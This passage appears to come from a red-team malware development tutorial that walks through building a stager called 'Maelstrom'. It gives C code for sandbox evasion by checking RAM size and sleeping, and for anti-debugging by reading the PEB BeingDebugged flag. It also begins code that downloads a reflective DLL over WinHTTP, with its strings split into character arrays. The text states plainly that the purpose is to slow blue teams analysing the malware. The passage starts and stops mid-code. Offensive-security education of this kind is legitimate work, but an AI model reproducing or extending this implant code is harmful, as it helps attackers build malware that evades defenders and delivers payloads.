((GLOBALMEMORYSTATUSEX)Api.GlobalMemoryStatusEx)(&memStatus);
float fSz = (float)memStatus.ullTotalPhys / (1024 * 1024 * 1024);
if (fSz > 4) {
return FALSE;
}
return TRUE;
}
If this function is true, then we continue.
Combined with a sleep:
void InternalSleep(API Api, DWORD DwSleep) {
((SLEEP)Api.Sleep)(DwSleep);
}
Anti-Debug
Anti-Debug, again, is about creativity. Repos such as LordNoteworthy/al-khaser contain loads of examples of this, however Maelstrom keeps this simple:
BOOL IsBeingDebugged() {
PPEB pPeb = (PPEB)PPEB_PTR;
if (pPeb->BeingDebugged == 1) {
return TRUE;
}
else {
return FALSE;
}
}
Read the PEB Struct, check if BeingDebugged is set to 1. Simple. Looking at the AntiDebug section of Al-Khaser there are tons methods, just implement these as/when needed.
These techniques are useful at hindering the blue teams if the payload is retrieved; it will slow them down from identifying the purpose of the malware, as well as furthering identifying the server. This should not be the only method of doing this. For example, if it is debugged and the IPs of the server are found, then there should be server side protections to control which implants are allowed to communicate with the server.
Downloading the Reflective DLL
For this, we will use WinHTTP as the code is ready an accessible. However, this is a fairly older library and WinInet is more modern. For readability of code, the following struct is defined:
typedef struct DLL_ {
LPVOID Buffer;
DWORD Size;
}
DLL, * PDLL;
And then passed into the function:
BOOL GetReflectiveDLL(API api, PDLL Dll)
We'll get to that shortly. But first, the config of the request is defined:
WCHAR wVerb[4] = {
'G', 'E', 'T', 0
};
WCHAR wEndpoint[9] = {
'/', 'a', '?', 's', 't', 'a', 'g', 'e', 0
};
WCHAR wUserAgent[10] = {
'M', 'a', 'e', 'l', 's', 't'